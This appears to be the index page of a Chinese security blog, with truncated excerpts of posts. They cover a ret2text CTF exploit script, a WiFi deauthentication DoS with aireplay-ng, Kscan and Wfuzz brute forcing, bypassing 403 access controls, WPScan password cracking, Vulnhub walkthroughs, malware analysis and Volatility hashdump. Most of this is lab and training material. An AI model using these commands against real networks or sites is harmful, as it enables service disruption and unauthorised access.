PWN入门-ret2text做题
PWN入门-ret2text做题[SWPUCTF 2021 新生赛]gift_pwn1checksec 文件名
开启堆栈不可执行保护(NX),不会把堆栈上数据当成指令来执行。
没有canary保护,可利用栈溢出来修改eip。
PIE地址随机花没有开启。
12345from pwn import *p=remote('node4.anna.nssctf.cn',28708)payload=b'a'*0x10+b'a'*8+p64(0x4005B6) #32位+4 64位+8p.sendline(payload)p.interactive()
[CISCN 2019华北]PWN1123456from pwn import *context(log_level='debug',arch='amd64',os='linux')p=process('./attachment')payload=b'a'*0x2c+p64(0x ...
对无线路由发起DoS攻击
对无线路由发起DoS攻击先断开连接,查看附近所有WiFi:
1airodump-ng wlan0
记录目标MAC地址,尝试攻击,“-0 0”表示无限次数攻击:
1aireplay-ng -0 0 -a MAC地址 wlan0
很有可能本机与目标路由不在同一信道,尝试更改信道:
1iwconfig wlan0 channel 目标信道
以上流程适用于攻击该无线路由,以下方法为针对目标终端。
查看都有哪些终端连接到该无线路由:
1airodump-ng --bssid 无线路由MAC地址 wlan0
嗅探到目标终端的MAC地址后,再次确认是否在同一信道,尝试进行攻击:
1aireply-ng -0 0 -a 无线路由MAC地址 -c 目标终端MAC地址 wlan0
Kscan初探
Kscan初探端口扫描:
1kscan -t 192.168.217.1/24
存活网段探测:
1kscan --spy
FOFA检索:
1kscan -f 'title="后台管理"' --fofa-size 15
暴力破解:
1kscan -t 127.0.0.1 --hydra
CDN识别:
1kscan -t www.iywaobt.cn
Forbidden_buster初探
Forbidden_buster初探基本方法利用各种技术方法和Header测试绕过401、403访问控制限制。
1forbidden_buster -u http://example.com
常用参数
-u | –url 待测Web应用程序完整URL路径
-m | –method 测试方法 默认GET
-H | –header 添加一个自定义Header
-d | –data 向请求体中添加数据 支持JSON
-p | –proxy 使用代理
–include-api API模糊测试
–include-unicode Unicode模糊测试 速度慢
–include-user-agent User-Agent模糊测试 速度慢
进阶方法1forbidden_buster --url "https://example.com/api/v1/secret" --method POST --header "Authorization: Bearer XXX" --data '{\"key\":\ ...
恶意代码分析实战
恶意代码分析实战静态分析查看可执行文件/DLL文件编译时间:PETool查看PE文件头,找到_IMAGE_NT_HEADERS.FileHeader.TimeDateStamp。
当导入表存在WS2_32.dll,则有联网行为。ADVAPI32.dll中存在创建服务和提权API。ole32.dll可创建COM实例。
通用脱壳机linxerUnpacker可脱FSG壳。
判断PE文件为EXE还是DLL:PETools文件头->特征值,看DLL复选框是否勾选。
恶意代码检测Vmware原理:in(0xED)指令与魔术字符串“VMXH”进行检测。另一种遍历HKLM\SYSTEM\CurrentControlSet\Control\Device以查找vmware值。也有其他各种老六行为。
CreateToolhelp32Snapshot进程、线程拍摄快照。
动态分析运行DLL:
1rundll32 *.dll,导出表函数名
用RegShot记录注册表操作。注册表创建服务路径:HKLM\SYSTEM\ControlSet001\Services\服务名,重要参数:ImagePa ...
靶机渗透实战基础-Vulnhub-NullByte
靶机渗透实战基础-Vulnhub-NullByte主机发现&端口扫描emm…没给IP,得自己扫:
1sudo arp-scan -l
或另一种方法:
1nmap -sn 192.168.2.0/24
再或另一种方法:
1sudo netdiscover -i wlan0 -r 192.168.2.0/24
发现NullByte主机IP为192.168.2.183。
分别探测该主机TCP和UDP端口服务:
12nmap --min-rate 10000 -sT -p- 192.168.2.183sudo nmap --min-rate 10000 -sU -p- 192.168.2.183
结果分别如下:
1234567891011PORT STATE SERVICE80/tcp open http111/tcp open rpcbind777/tcp open multiling-http58567/tcp open unknownPORT STATE SERVICE111/udp open rpcbind5353/udp ...
靶机渗透实战基础-Vulnhub-Prime_1
靶机渗透实战基础-Vulnhub-Prime:1主机发现&端口扫描攻击主机IP:192.168.2.130,C段扫描:
1nmap -sP 192.168.2.1/24
发现目标主机IP地址为:192.168.2.198。
进行进攻性扫描:
1nmap -A 192.168.2.198
发现两个端口开放:
12345678910PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: | 2048 8d:c5:20:23:ab:10:ca:de:e2:fb:e5:cd:4d:2d:4d:72 (RSA)| 256 94:9c:f8:6f:5c:f1:4c:11:95:7f:0a:2c:34:76:50:0b (ECDSA)|_ 256 4b:f6:f1:25:b6:13:26:d4:fc:9e:b0:72:9f:f4:69:68 (ED25519)80/tcp open ht ...
Wfuzz基础操作
Wfuzz基础操作爆后台文件:
1wfuzz -w wordlist URL/FUZZ.php
其中wordlist填字典目录,URL即为具体连接,关键字FUZZ为爆破点。
爆后台目录:
1wfuzz -w wordlist URL/FUZZ
爆URL参数:
1wfuzz -z range,000-99 url/xxx.php?id=FUZZ
其中range为id的取值范围。
指定cookie或session:
1wfuzz -z range,000-999 -b session=session -b cookie=cookie url/xxx.php?id=FUZZ
递归测试,在已找出的目录再递归一次:
1wfuzz -z list,"admin-login.php-test.php" -R 1 URL/FUZZ
POST双传参:
1wfuzz -w /usr/share/wfuzz/wordlist/general/mima.txt -w /usr/share/wfuzz/wordlist/general/mima.txt -d "usern ...
WPScan常用方法
WPScan常用方法参数
–url|-u 扫描指定URL或域名。
–force|-f 如果正在WordPress强制WPScan不检查。
–enumerate|-e [option(s)] 信息枚举
u 用户名id 1-10
u[10-20] 指定用户名id 10-20
p 插件程序
vp 仅漏洞插件程序
ap 所有插件程序(慢)
tt timthumbs
t 主题
vt 仅漏洞主题
at 所有主题(慢)
常见用法123wpscan -u 192.168.41.130 #收集基本信息wpscan -u 192.168.41.130 -e u vp #列出用户名列表、漏洞插件wpscan -u 192.168.41.130 -e u --wordlist /root/wordlist.txt #用户名密码爆破
Volatility初探
Volatility初探寻找profile:
1vol -f mem.vmem imageinfo
查看进程:
1vol -f mem.vmem --profile=XXX pslist
进程转储:
1vol -f mem.vmem --profile=XXX memdump -p 2012 -D ./
查看用户密码:
1vol -f mem.vmem --profile=XXX hashdump
查看cmd进程:
1vol -f mem.vmem --profile=XXX cmdscan
查找flag关键词:
1vol -f mem.vmem --profile=XXX filescan | grep flag
文件转储:
1vol -f mem.vmem --profile=XXX dumpfiles -Q 0X00000123456 -D ./
查看Windows窗口程序,显示10行内容:
1vol -f mem.vmem --profile=XXX windows | grep flag -A 10
从注册表中提取LSA密钥信息:
1vol -f mem.vm ...